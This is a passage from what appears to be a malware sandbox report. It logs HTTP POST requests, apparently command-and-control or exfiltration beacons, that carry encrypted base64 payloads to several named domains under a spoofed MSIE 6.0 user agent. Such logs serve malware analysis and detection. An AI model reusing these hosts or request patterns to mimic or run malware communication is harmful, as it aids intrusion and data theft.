McXwDMcPSgmiCm6w9grqwZAVaFu9g0Sn63c3Nm4nm2uvyGplzl2SbhWPCRsrYbGDHaAvzA3Oxt9+3HxXtIQi5+usaymE0+0jWxGpsMeXLh4ymPNvKvO6j+m10aXWeD63WUouhGT7OAi+w4Q8npHSvSTaSLpGhk7FcJVURcQUh2zTLIK39h/XRKPO4DwuUbxtE19O19//F/fy6Po/53dXyvTWw1jzrTv68gihU/8SVqJV7JCcTUM1wPw7AfbtapMQ8WTZyi5eJWCU/R/WM38pnFGSretERTxdWgIAxr+FsBphk865z5KDmj4nDprdXC02aoFPCrSsh4/1gxK8Be8oN9NkJ8weh1FcFoUF5HCw3Vn2sC+QBA7tSzYtDZXqT6AAXbX+MuABwPQHvnJTqRqIHEsFtYUNI02fwUOyxns0TaOW1GZjT+zChr63lO4a5yuO+qjARg69Kt/8SbnTn2H+Cwq46734wX11+SRI64g7XB0aA25Y3n0913EAZaQFFQCoZ9FAeHFllgFkw+iyeaqhYbn3PRqCR1wFQnA=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.waldi.plCache-Control: no-cacheData Raw: 30 6f 6f 72 33 37 38 7a 57 51 6d 4d 75 79 75 62 6e 71 34 37 54 6b 6a 30 6b 2f 77 56 34 7a 51 52 59 31 39 33 6f 46 4c 6a 4b 4b 33 4e 62 62 46 70 73 63 6c 30 49 53 6d 45 6b 6a 43 6b 45 2f 35 68 4c 68 32 45 7a 62 79 45 4f 65 30 46 68 48 79 69 4e 49 36 47 6b 4e 68 69 76 39 46 6c 4d 70 69 79 74 37 50 61 54 35 65 48 51 43 68 77 4d 49 51 4d 47 65 4f 64 57 51 46 76 47 34 46 67 72 4e 47 66 41 32 42 57 77 34 2f 6b 6c 41 6f 4e 6e 53 6c 30 32 54 44 55 53 48 2b 47 35 52 6d 2f 46 32 5a 75 4c 70 30 7a 35 65 35 67 70 71 57 66 31 7a 2b 72 66 50 4b 75 32 52 35 79 59 30 71 45 37 54 75 32 64 34 36 6c 49 6f 79 44 76 47 68 49 5a 31 54 59 65 72 6d 41 66 4b 51 37 63 77 6d 32 42 36 6d 78 65 72 58 41 68 34 2b 5a 39 31 77 79 32 75 41 4c 65 79 4c 42 51 4e 66 5a 4d 6e 6c 74 68 79 4e 75 63 6d 34 73 4b 5a 36 34 33 66 36 43 52 2f 42 69 51 6d 6a 43 75 4e 48 64 71 68 63 6d 69 58 66 36 56 65 4c 2f 38 73 50 48 75 55 64 66 4a 50 6b 51 48 4a 54 33 46 4f 37 54 71 74 39 31 79 45 6a 57 50 68 51 64 5a 6d 67 79 41 49 6a 38 4a 65 74 4d 43 65 50 61 69 79 61 30 6b 47 58 41 6f 73 63 37 59 62 6c 76 56 75 54 30 6d 70 74 74 6b 62 58 45 51 63 34 75 46 75 66 4c 70 71 6b 6a 44 4b 44 69 59 50 48 79 67 2f 53 49 77 4d 6f 73 49 59 64 6f 6b 79 6f 6c 43 6f 49 70 2f 38 52 76 6f 63 44 6f 6e 37 70 64 33 73 39 4d 4f 33 46 7a 68 6f 74 44 62 34 47 44 7a 38 50 62 4f 33 47 37 51 73 4a 55 69 34 55 39 6b 6e 56 31 35 61 6e 70 74 57 34 33 43 71 48 6a 2b 7a 70 6c 56 6a 75 34 30 78 75 50 64 30 64 30 66 76 6e 33 67 70 49 67 4d 70 36 56 64 35 59 42 4d 57 57 70 76 71 71 61 58 70 69 57 77 50 57 68 6f 70 52 69 64 35 2f 47 55 42 2b 62 6c 7a 62 69 52 33 78 5a 52 4b 34 38 5a 49 30 4e 6d 6c 39 72 51 73 57 59 6d 74 52 44 6c 6f 2b 34 33 54 53 58 42 69 2b 48 36 37 45 63 36 35 2b 70 5a 46 53 6a 53 79 37 47 47 42 7a 51 72 47 31 71 44 6f 6a 2f 61 67 3d 3d Data Ascii: 0oor378zWQmMuyubnq47Tkj0k/wV4zQRY193oFLjKK3NbbFpscl0ISmEkjCkE/5hLh2EzbyEOe0FhHyiNI6GkNhiv9FlMpiyt7PaT5eHQChwMIQMGeOdWQFvG4FgrNGfA2BWw4/klAoNnSl02TDUSH+G5Rm/F2ZuLp0z5e5gpqWf1z+rfPKu2R5yY0qE7Tu2d46lIoyDvGhIZ1TYermAfKQ7cwm2B6mxerXAh4+Z91wy2uALeyLBQNfZMnlthyNucm4sKZ643f6CR/BiQmjCuNHdqhcmiXf6VeL/8sPHuUdfJPkQHJT3FO7Tqt91yEjWPhQdZmgyAIj8JetMCePaiya0kGXAosc7YblvVuT0mpttkbXEQc4uFufLpqkjDKDiYPHyg/SIwMosIYdokyolCoIp/8RvocDon7pd3s9MO3FzhotDb4GDz8PbO3G7QsJUi4U9knV15anptW43CqHj+zplVju40xuPd0d0fvn3gpIgMp6Vd5YBMWWpvqqaXpiWwPWhopRid5/GUB+blzbiR3xZRK48ZI0Nml9rQsWYmtRDlo+43TSXBi+H67Ec65+pZFSjSy7GGBzQrG1qDoj/ag==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nelipak.nlCache-Control: no-cacheData Raw: 4d 63 58 77 44 4d 63 50 53 67 6d 69 43 6d 36 77 39 67 72 71 77 5a 41 56 61 46 75 39 67 30 53 6e 36 33 63 33 4e 6d 34 6e 6d 32 75 76 79 47 70 6c 7a 6c 32 53 62 68 57 50 43 52 73 72 59 62 47 44 48 61 41 76 7a 41 33 4f 78 74 39 2b 33 48 78 58 74 49 51 69 35 2b 75 73 61 79 6d 45 30 2b 30 6a 57 78 47 70 73 4d 65 58 4c 68 34 79 6d 50 4e 76 4b 76 4f 36 6a 2b 6d 31 30 61 58 57 65 44 36 33 57 55 6f 75 68 47 54 37 4f 41 69 2b 77 34 51 38 6e 70 48 53 76 53 54 61 53 4c 70 47 68 6b 37 46 63 4a 56 55 52 63 51 55 68 32 7a 54 4c 49 4b 33 39 68 2f 58 52 4b 50 4f 34 44 77 75 55 62 78 74 45 31 39 4f 31 39 2f 2f 46 2f 66 79 36 50 6f 2f 35 33 64 58 79 76 54 57 77 31 6a 7a 72 54 76 36 38 67 69 68 55 2f 38 53 56 71 4a 56 37 4a 43 63 54 55 4d 31 77 50 77 37 41 66 62 74 61 70 4d 51 38 57 54 5a 79 69 35 65 4a 57 43 55 2f 52 2f 57 4d 33 38 70 6e 46 47 53 72 65 74 45 52 54 78 64 57 67 49 41 78 72 2b 46 73 42 70 68 6b 38 36 35 7a 35 4b 44 6d 6a 34 6e 44 70 72 64 58 43 30 32 61 6f 46 50 43 72 53 73 68 34 2f 31 67 78 4b 38 42 65 38 6f 4e 39 4e 6b 4a 38 77 65 68 31 46 63 46 6f 55 46 35 48 43 77 33 56 6e 32 73 43 2b 51 42 41 37 74 53 7a 59 74 44 5a 58 71 54 36 41 41 58 62 58 2b 4d 75 41 42 77 50 51 48 76 6e 4a 54 71 52 71 49 48 45 73 46 74 59 55 4e 49 30 32 66 77 55 4f 79 78 6e 73 30 54 61 4f 57 31 47 5a 6a 54 2b 7a 43 68 72 36 33 6c 4f 34 61 35 79 75 4f 2b 71 6a 41 52 67 36 39 4b 74 2f 38 53 62 6e 54 6e 32 48 2b 43 77 71 34 36 37 33 34 77 58 31 31 2b 53 52 49 36 34 67 37 58 42 30 61 41 32 35 59 33 6e 30 39 31 33 45 41 5a 61 51 46 46 51 43 6f 5a 39 46 41 65 48 46 6c 6c 67 46 6b 77 2b 69 79 65 61 71 68 59 62 6e 33 50 52 71 43 52 31 77 46 51 6e 41 3d Data Ascii: McXwDMcPSgmiCm6w9grqwZAVaFu9g0Sn63c3Nm4nm2uvyGplzl2SbhWPCRsrYbGDHaAvzA3Oxt9+3HxXtIQi5+usaymE0+0jWxGpsMeXLh4ymPNvKvO6j+m10aXWeD63WUouhGT7OAi+w4Q8npHSvSTaSLpGhk7FcJVURcQUh2zTLIK39h/XRKPO4DwuUbxtE19O19//F/fy6Po/53dXyvTWw1jzrTv68gihU/8SVqJV7JCcTUM1wPw7AfbtapMQ8WTZyi5eJWCU/R/WM38pnFGSretERTxdWgIAxr+FsBphk865z5KDmj4nDprdXC02aoFPCrSsh4/1gxK8Be8oN9NkJ8weh1FcFoUF5HCw3Vn2sC+QBA7tSzYtDZXqT6AAXbX+MuABwPQHvnJTqRqIHEsFtYUNI02fwUOyxns0TaOW1GZjT+zChr63lO4a5yuO+qjARg69Kt/8SbnTn2H+Cwq46734wX11+SRI64g7XB0aA25Y3n0913EAZaQFFQCoZ9FAeHFllgFkw+iyeaqhYbn3PRqCR1wFQnA=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.iamdirt.comCache-Control: no-cacheData Raw: 41 4c 51 75 33 6f 73 72 57 51 6e 59 73 45 6c 53 34 6f 76 69 66 66 54 5a 4f 34 4c 52 31 41 6b 75 37 38 31 34 35 4c 44 7a 47 41 39 31 32 79 34 72 75 48 72 45 74 36 77 4b 46 76 54 33 75 6c 32 55 4a 6b 35 32 6f 33 34 61 72 4e 78 42 2f 57 7a 6c 66 34 39 4a 71 39 7a 6a 63 58 59 35 32 6a 51 54 4d 79 56 53 47 67 74 6b 33 69 4c 45 43 64 30 43 4c 7a 38 4c 42 4c 68 45 6a 6c 75 4f 45 4e 31 62 2b 6f 47 57 66 2f 45 66 5a 55 7a 32 6a 50 37 69 55 57 50 77 59 43 4f 46 78 6b 6b 35 79 55 62 65 63 79 62 6d 48 6b 4f 55 4c 56 35 64 52 63 6a 48 68 30 79 61 73 6d 67 69 33 68 79 34 56 65 52 50 6a 48 52 77 64 4b 47 4e 55 76 50 35 4c 67 32 69 65 36 42 78 65 45 4b 76 54 46 6b 30 6f 67 53 4e 6a 75 6a 6c 52 64 53 7a 46 6b 73 33 36 66 4f 57 2b 2f 4f 36 5a 6a 48 44 72 54 6b 42 78 4d 6a 47 57 71 30 45 4e 55 35 46 4f 34 52 65 4c 51 2f 72 72 54 56 32 32 4e 66 47 66 4c 4b 4f 71 32 2b 70 46 37 6f 5a 62 79 69 33 5a 6f 59 54 76 47 77 73 47 56 31 30 76 58 4e 48 4a 77 53 6a 69 4b 39 36 7a 55 70 72 75 44 6c 7a 6f 35 59 6a 6e 74 6b 65 67 48 78 75 59 57 31 55 6f 65 70 73 37 67 33 64 43 65 59 34 2f 71 35 71 43 35 42 32 4d 47 50 76 42 4d 31 37 65 39 56 41 6a 30 4f 2f 47 69 6c 51 2b 77 46 50 48 35 73 6f 7a 76 35 4d 77 4b 4e 76 47 61 55 6e 74 48 68 4c 79 64 50 43 6e 56 67 74 50 73 4e 35 4b 4b 72 65 4c 37 31 35 58 71 4b 70 36 7a 58 4a 77 36 39 78 72 57 59 2b 49 65 6a 6c 44 53 51 79 38 48 2f 63 41 34 65 41 6f 78 6c 6d 67 76 37 6d 36 33 62 64 54 69 70 43 63 4e 54 77 46 48 6c 59 37 66 74 4d 49 50 51 4a 50 71 50 69 37 6e 5a 42 34 4b 34 49 38 42 53 71 43 61 77 78 76 49 70 78 49 42 6f 51 68 2f 36 35 57 64 2b 56 6d 4f 77 73 74 38 75 34 52 45 57 4e 53 31 70 72 71 6b 46 54 68 33 72 4f 46 67 68 42 35 6e 76 74 74 5a 6d 31 52 71 77 74 45 59 33 2b 6e 55 68 32 7a 43 45 76 75 50 67 51 77 51 52 75 Data Ascii: ALQu3osrWQnYsElS4oviffTZO4LR1Aku78145LDzGA912y4ruHrEt6wKFvT3ul2UJk52o34arNxB/Wzlf49Jq9zjcXY52jQTMyVSGgtk3iLECd0CLz8LBLhEjluOEN1b+oGWf/EfZUz2jP7iUWPwYCOFxkk5yUbecybmHkOULV5dRcjHh0yasmgi3hy4VeRPjHRwdKGNUvP5Lg2ie6BxeEKvTFk0ogSNjujlRdSzFks36fOW+/O6ZjHDrTkBxMjGWq0ENU5FO4ReLQ/rrTV22NfGfLKOq2+pF7oZbyi3ZoYTvGwsGV10vXNHJwSjiK96zUpruDlzo5YjntkegHxuYW1Uoeps7g3dCeY4/q5qC5B2MGPvBM17e9VAj0O/GilQ+wFPH5sozv5MwKNvGaUntHhLydPCnVgtPsN5KKreL715XqKp6zXJw69xrWY+IejlDSQy8H/cA4eAoxlmgv7m63bdTipCcNTwFHlY7ftMIPQJPqPi7nZB4K4I8BSqCawxvIpxIBoQh/65Wd+VmOwst8u4REWNS1prqkFTh3rOFghB5nvttZm1RqwtEY3+nUh2zCEvuPgQwQRu
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.aevga.comCache-Control: no-cacheData Raw: 2b 6d 42 48 62 72 37 6f 52 41 6e 4b 78 53 43 4b 69 58 6b 34 35 4b 45 55 41 69 56 2b 73 53 30 6f 30 6a 7a 53 79 43 7a 48 59 2b 79 2f 44 4b 42 66 7a 57 62 4f 78 72 38 5a 5a 65 38 5a 65 7a 47 35 32 6a 68 2b 6a 4a 6f 48 4e 47 5a 61 68 4a 2f 49 73 41 35 51 73 59 53 39 63 30 52 4a 6f 73 47 42 63 69 6e 72 72 79 6e 6b 36 30 5a 47 37 32 6c 42 4c 4a 53 71 37 70 35 62 36 45 6e 49 42 69 71 61 31 52 7a 4d 6a 43 71 2f 44 55 56 43 4c 70 31 58 4c 4c 44 38 34 38 48 5a 31 37 6f 59 4a 56 37 2b 55 4c 50 62 4f 76 63 6b 34 53 47 71 6c 66 62 6d 6b 41 45 73 4f 61 45 6a 2b 65 39 6b 4f 54 50 48 69 52 65 75 44 44 54 50 4f 4d 34 37 65 57 6f 51 79 68 63 42 2f 77 61 65 2f 58 68 31 55 41 4d 6f 70 6e 6d 2f 76 36 6a 4f 4d 67 4b 6d 32 41 46 51 63 67 45 38 4c 49 35 6f 66 75 30 79 74 78 4f 4d 66 36 74 44 50 74 68 68 4f 6c 56 71 56 76 68 64 74 6a 42 78 70 6d 41 68 48 46 70 51 36 6e 55 44 45 74 39 36 30 54 35 63 61 53 7a 47 54 56 53 32 4e 47 78 5a 32 73 6f 55 62 4a 79 56 34 72 32 31 42 6d 44 64 61 4e 58 63 39 54 67 35 74 66 77 79 58 53 4e 48 4c 30 38 65 57 69 2b 4a 44 77 69 54 75 4d 4c 65 4d 2b 30 6f 4d 6e 72 4a 50 4b 76 30 6a 32 4d 36 67 58 4a 35 75 46 6f 52 79 65 4c 73 6f 6d 51 2f 65 42 47 4a 6a 73 6a 4a 6e 39 79 4a 4d 57 6b 5a 56 59 76 58 63 34 37 61 41 37 31 2f 57 32 37 57 48 65 31 43 54 4b 66 6e 32 5a 35 58 4a 79 43 75 62 32 74 57 78 6b 61 61 38 54 61 4d 7a 5a 69 65 39 6b 55 73 78 49 39 50 7a 55 6d 57 73 63 55 42 79 7a 53 30 59 4f 62 69 50 54 66 75 2f 52 33 79 31 70 62 43 79 72 35 74 39 66 76 48 61 61 74 45 54 37 35 77 5a 76 4f 46 6a 33 57 6d 57 4b 6f 62 6f 78 30 49 45 69 7a 42 32 71 33 58 41 38 74 72 59 75 79 48 65 71 4b 42 56 4f 43 72 32 73 68 37 61 65 55 64 36 41 76 55 57 76 47 36 71 35 42 51 6a 37 56 77 58 70 66 4e 32 30 51 53 67 6f 75 6a 5a 69 66 53 48 6e 65 70 Data Ascii: +mBHbr7oRAnKxSCKiXk45KEUAiV+sS0o0jzSyCzHY+y/DKBfzWbOxr8ZZe8ZezG52jh+jJoHNGZahJ/IsA5QsYS9c0RJosGBcinrrynk60ZG72lBLJSq7p5b6EnIBiqa1RzMjCq/DUVCLp1XLLD848HZ17oYJV7+ULPbOvck4SGqlfbmkAEsOaEj+e9kOTPHiReuDDTPOM47eWoQyhcB/wae/Xh1UAMopnm/v6jOMgKm2AFQcgE8LI5ofu0ytxOMf6tDPthhOlVqVvhdtjBxpmAhHFpQ6nUDEt960T5caSzGTVS2NGxZ2soUbJyV4r21BmDdaNXc9Tg5tfwyXSNHL08eWi+JDwiTuMLeM+0oMnrJPKv0j2M6gXJ5uFoRyeLsomQ/eBGJjsjJn9yJMWkZVYvXc47aA71/W27WHe1CTKfn2Z5XJyCub2tWxkaa8TaMzZie9kUsxI9PzUmWscUByzS0YObiPTfu/R3y1pbCyr5t9fvHaatET75wZvOFj3WmWKobox0IEizB2q3XA8trYuyHeqKBVOCr2sh7aeUd6AvUWvG6q5BQj7VwXpfN20QSgoujZifSHnep
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.maktraxx.comCache-Control: no-cacheData Raw: 6e 4d 32 31 34 64 35 49 57 51 6e 36 74 76 43 78 4b 52 71 75 5a 73 45 4a 41 57 77 65 5a 4f 74 49 38 6b 34 35 78 6b 46 61 56 78 61 66 42 66 66 4d 52 43 73 4c 6e 4a 48 50 38 78 72 6e 43 4b 44 79 59 69 5a 68 59 37 37 50 35 45 2f 79 67 54 47 57 49 4d 4e 53 64 36 4a 52 32 76 4b 2b 79 39 49 42 72 67 4b 45 52 7a 6c 36 2f 51 78 49 4b 47 6f 2b 48 65 67 55 47 52 76 68 74 67 47 57 6a 4f 52 4c 6d 66 46 78 68 45 4e 6c 6d 37 67 50 70 41 57 35 62 36 36 54 47 41 59 57 68 49 51 4f 4a 41 61 4c 4c 74 56 37 39 45 4f 4e 71 70 65 38 38 76 73 6f 67 56 34 65 58 70 2f 30 45 4e 31 57 52 44 62 36 46 66 74 62 79 67 79 51 35 39 56 58 7a 7a 65 34 76 34 62 62 65 54 48 48 33 58 56 30 74 61 63 6e 64 4b 72 2f 6a 54 31 54 4b 44 59 55 69 67 38 70 42 77 72 68 76 68 68 50 38 4d 54 47 49 6f 78 79 30 6d 4e 59 64 50 6c 5a 6a 6e 6f 73 69 32 4a 6f 6f 76 74 37 55 72 6d 34 70 6c 6f 6d 69 6f 61 37 70 74 32 77 59 39 61 6f 4f 64 6b 4c 69 2b 4b 30 75 42 6f 54 4b 4d 47 6c 6a 48 68 44 34 6c 79 6c 51 72 4b 4d 2b 71 6d 6c 75 63 52 2b 4f 46 4d 52 4e 31 62 31 69 6b 77 46 61 38 34 73 4f 4f 35 76 6a 52 62 53 64 5a 70 47 63 2b 4c 52 39 72 55 43 46 42 68 74 7a 6f 72 6c 41 4f 59 4d 54 77 2b 55 37 76 66 7a 35 34 49 46 35 4b 50 77 70 75 58 51 65 61 30 71 35 76 4b 65 66 45 52 79 6b 71 55 6a 62 4e 70 65 48 50 6b 62 64 46 78 56 4b 59 2f 71 35 65 75 47 6e 66 4b 33 36 73 2b 4a 6a 61 6d 78 46 39 65 6e 78 46 44 4b 33 50 76 59 78 52 37 4e 45 71 69 69 79 6a 78 63 2f 42 39 71 75 5a 42 62 6b 70 7a 53 39 66 31 74 73 30 68 61 61 4c 33 50 70 6a 56 4b 4d 55 68 6a 64 51 44 64 64 33 51 45 39 4e 47 51 63 31 6c 6b 46 41 36 39 70 79 68 70 4a 2f 37 5a 68 67 75 4e 35 77 71 65 39 31 75 61 35 6a 63 64 6c 42 36 54 31 63 73 69 54 62 66 79 6d 4b 53 72 49 6e 70 64 48 4e 55 62 76 77 3d 3d Data Ascii: nM214d5IWQn6tvCxKRquZsEJAWweZOtI8k45xkFaVxafBffMRCsLnJHP8xrnCKDyYiZhY77P5E/ygTGWIMNSd6JR2vK+y9IBrgKERzl6/QxIKGo+HegUGRvhtgGWjORLmfFxhENlm7gPpAW5b66TGAYWhIQOJAaLLtV79EONqpe88vsogV4eXp/0EN1WRDb6FftbygyQ59VXzze4v4bbeTHH3XV0tacndKr/jT1TKDYUig8pBwrhvhhP8MTGIoxy0mNYdPlZjnosi2Joovt7Urm4plomioa7pt2wY9aoOdkLi+K0uBoTKMGljHhD4lylQrKM+qmlucR+OFMRN1b1ikwFa84sOO5vjRbSdZpGc+LR9rUCFBhtzorlAOYMTw+U7vfz54IF5KPwpuXQea0q5vKefERykqUjbNpeHPkbdFxVKY/q5euGnfK36s+JjamxF9enxFDK3PvYxR7NEqiiyjxc/B9quZBbkpzS9f1ts0haaL3PpjVKMUhjdQDdd3QE9NGQc1lkFA69pyhpJ/7ZhguN5wqe91ua5jcdlB6T1csiTbfymKSrInpdHNUbvw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.aevga.comCache-Control: no-cacheData Raw: 2b 6d 42 48 62 72 37 6f 52 41 6e 4b 78 53 43 4b 69 58 6b 34 35 4b 45 55 41 69 56 2b 73 53 30 6f 30 6a 7a 53 79 43 7a 48 59 2b 79 2f 44 4b 42 66 7a 57 62 4f 78 72 38 5a 5a 65 38 5a 65 7a 47 35 32 6a 68 2b 6a 4a 6f 48 4e 47 5a 61 68 4a 2f 49 73 41 35 51 73 59 53 39 63 30 52 4a 6f 73 47 42 63 69 6e 72 72 79 6e 6b 36 30 5a 47 37 32 6c 42 4c 4a 53 71 37 70 35 62 36 45 6e 49 42 69 71 61 31 52 7a 4d 6a 43 71 2f 44 55 56 43 4c 70 31 58 4c 4c 44 38 34 38 48 5a 31 37 6f 59 4a 56 37 2b 55 4c 50 62 4f 76 63 6b 34 53 47 71 6c 66 62 6d 6b 41 45 73 4f 61 45 6a 2b 65 39 6b 4f 54 50 48 69 52 65 75 44 44 54 50 4f 4d 34 37 65 57 6f 51 79 68 63 42 2f 77 61 65 2f 58 68 31 55 41 4d 6f 70 6e 6d 2f 76 36 6a 4f 4d 67 4b 6d 32 41 46 51 63 67 45 38 4c 49 35 6f 66 75 30 79 74 78 4f 4d 66 36 74 44 50 74 68 68 4f 6c 56 71 56 76 68 64 74 6a 42 78 70 6d 41 68 48 46 70 51 36 6e 55 44 45 74 39 36 30 54 35 63 61 53 7a 47 54 56 53 32 4e 47 78 5a 32 73 6f 55 62 4a 79 56 34 72 32 31 42 6d 44 64 61 4e 58 63 39 54 67 35 74 66 77 79 58 53 4e 48 4c 30 38 65 57 69 2b 4a 44 77 69 54 75 4d 4c 65 4d 2b 30 6f 4d 6e 72 4a 50 4b 76 30 6a 32 4d 36 67 58 4a 35 75 46 6f 52 79 65 4c 73 6f 6d 51 2f 65 42 47 4a 6a 73 6a 4a 6e 39 79 4a 4d 57 6b 5a 56 59 76 58 63 34 37 61 41 37 31 2f 57 32 37 57 48 65 31 43 54 4b 66 6e 32 5a 35 58 4a 79 43 75 62 32 74 57 78 6b 61 61 38 54 61 4d 7a 5a 69 65 39 6b 55 73 78 49 39 50 7a 55 6d 57 73 63 55 42 79 7a 53 30 59 4f 62 69 50 54 66 75 2f 52 33 79 31 70 62 43 79 72 35 74 39 66 76 48 61 61 74 45 54 37 35 77 5a 76 4f 46 6a 33 57 6d 57 4b 6f 62 6f 78 30 49 45 69 7a 42 32 71 33 58 41 38 74 72 59 75 79 48 65 71 4b 42 56 4f 43 72 32 73 68 37 61 65 55 64 36 41 76 55 57 76 47 36 71 35 42 51 6a 37 56 77 58 70 66 4e 32 30 51 53 67 6f 75 6a 5a 69 66 53 48 6e 65 70 Data Ascii: +mBHbr7oRAnKxSCKiXk45KEUAiV+sS0o0jzSyCzHY+y/DKBfzWbOxr8ZZe8ZezG52jh+jJoHNGZahJ/IsA5QsYS9c0RJosGBcinrrynk60ZG72lBLJSq7p5b6EnIBiqa1RzMjCq/DUVCLp1XLLD848HZ17oYJV7+ULPbOvck4SGqlfbmkAEsOaEj+e9kOTPHiReuDDTPOM47eWoQyhcB/wae/Xh1UAMopnm/v6jOMgKm2AFQcgE8LI5ofu0ytxOMf6tDPthhOlVqVvhdtjBxpmAhHFpQ6nUDEt960T5caSzGTVS2NGxZ2soUbJyV4r21BmDdaNXc9Tg5tfwyXSNHL08eWi+JDwiTuMLeM+0oMnrJPKv0j2M6gXJ5uFoRyeLsomQ/eBGJjsjJn9yJMWkZVYvXc47aA71/W27WHe1CTKfn2Z5XJyCub2tWxkaa8TaMzZie9kUsxI9PzUmWscUByzS0YObiPTfu/R3y1pbCyr5t9fvHaatET75wZvOFj3WmWKobox0IEizB2q3XA8trYuyHeqKBVOCr2sh7aeUd6AvUWvG6q5BQj7VwXpfN20QSgoujZifSHnep
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.edimart.huCache-Control: no-cacheData Raw: 2f 71 52 75 67 6e 73 68 62 77 6b 31 55 55 35 57 45 71 68 74 51 32 52 31 6e 64 47 42 4b 64 31 48 33 2b 4a 45 63 48 52 7a 66 56 78 6a 71 32 45 5a 65 78 66 43 77 6b 38 66 6e 62 31 4e 70 6c 6c 66 4b 50 2f 48 2b 49 6a 30 71 62 61 4a 69 33 45 44 2f 52 79 5a 46 6c 31 72 55 78 41 5a 47 6c 2f 76 74 4d 34 70 31 51 33 2b 30 6e 62 48 5a 67 69 78 54 62 36 57 2f 67 59 68 43 47 42 75 72 54 6d 4b 46 54 4d 30 32 50 63 62 39 45 79 6d 49 70 66 44 77 36 43 53 32 69 4f 6b 68 74 38 74 4f 6b 74 42 67 43 45 6d 48 31 58 51 34 6f 78 34 63 52 4d 61 68 41 58 70 38 4d 76 43 78 30 46 2f 36 77 6f 4e 77 66 43 54 43 4e 34 4f 4d 36 31 36 41 69 56 37 2f 52 6d 56 37 57 43 64 73 2b 65 4f 37 61 66 50 48 63 31 6e 31 6f 76 78 4b 66 4e 2f 55 4f 6c 42 52 36 4e 61 36 7a 65 4d 51 7a 37 67 51 73 4d 38 49 34 34 77 4c 71 58 58 51 6b 56 54 65 6d 62 55 2f 58 67 4b 6f 58 4a 47 6d 53 76 46 34 56 6e 66 78 6e 46 49 76 50 30 73 39 79 50 45 76 2f 7a 6b 4d 38 47 62 6a 42 79 74 49 4f 69 61 7a 38 55 49 6a 73 38 42 63 52 74 64 44 6a 6c 74 4b 36 6b 36 41 45 4f 4b 44 42 48 66 62 34 41 48 63 71 74 74 59 4f 32 4a 34 56 61 35 58 50 67 75 34 5a 56 66 63 2f 39 58 41 65 30 72 7a 51 65 38 35 49 7a 79 36 54 4a 65 6d 2f 32 66 66 30 34 2b 66 37 35 79 64 30 65 53 70 39 66 70 70 53 54 7a 78 33 34 32 61 63 5a 66 2f 75 74 6c 45 72 51 72 2f 2f 53 75 77 4c 2f 67 78 6d 37 55 31 37 6f 37 56 47 6b 61 67 58 2b 79 79 36 31 66 51 53 41 46 4c 49 42 54 36 6e 70 51 52 4b 44 79 49 31 2f 4e 57 63 6a 2b 44 77 5a 78 76 6d 39 68 75 63 61 65 68 58 44 4f 37 71 51 70 48 5a 72 63 63 43 64 53 4e 59 50 4c 65 35 41 67 43 6d 75 38 39 70 37 5a 58 79 4c 5a 33 58 71 33 2b 5a 42 73 64 47 43 47 74 2f 53 36 72 63 59 6b 5a 51 4d 65 30 58 37 73 48 47 43 6f 67 61 38 7a 4c 4a 49 69 6a 69 6b 55 41 43 57 6e 6a 74 75 45 69 30 69 41 42 6b 73 4d 44 77 3d 3d Data Ascii: /qRugnshbwk1UU5WEqhtQ2R1ndGBKd1H3+JEcHRzfVxjq2EZexfCwk8fnb1NpllfKP/H+Ij0qbaJi3ED/RyZFl1rUxAZGl/vtM4p1Q3+0nbHZgixTb6W/gYhCGBurTmKFTM02Pcb9EymIpfDw6CS2iOkht8tOktBgCEmH1XQ4ox4cRMahAXp8MvCx0F/6woNwfCTCN4OM616AiV7/RmV7WCds+eO7afPHc1n1ovxKfN/UOlBR6Na6zeMQz7gQsM8I44wLqXXQkVTembU/XgKoXJGmSvF4VnfxnFIvP0s9yPEv/zkM8GbjBytIOiaz8UIjs8BcRtdDjltK6k6AEOKDBHfb4AHcqttYO2J4Va5XPgu4ZVfc/9XAe0rzQe85Izy6TJem/2ff04+f75yd0eSp9fppSTzx342acZf/utlErQr//SuwL/gxm7U17o7VGkagX+yy61fQSAFLIBT6npQRKDyI1/NWcj+DwZxvm9hucaehXDO7qQpHZrccCdSNYPLe5AgCmu89p7ZXyLZ3Xq3+ZBsdGCGt/S6rcYkZQMe0X7sHGCoga8zLJIijikUACWnjtuEi0iABksMDw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.wifi4all.nlCache-Control: no-cacheData Raw: 4e 73 73 4b 6d 43 50 56 62 77 6b 33 4a 47 53 4a 71 72 68 7a 46 6b 78 7a 5a 48 64 4a 43 6a 4a 69 42 77 55 75 35 64 43 2f 64 34 44 4c 71 32 6a 38 63 58 2f 32 64 7a 6a 53 77 53 76 76 33 64 37 64 74 73 48 6c 31 41 55 33 62 68 6f 4d 68 64 36 4d 73 47 52 4f 37 41 32 6c 7a 59 75 44 65 4b 4a 48 6d 65 32 71 72 78 70 43 6f 61 67 73 37 2f 7a 73 52 31 49 4f 74 4a 70 4d 47 36 2b 7a 37 4f 61 31 43 4e 6b 47 75 30 63 57 6e 63 59 79 44 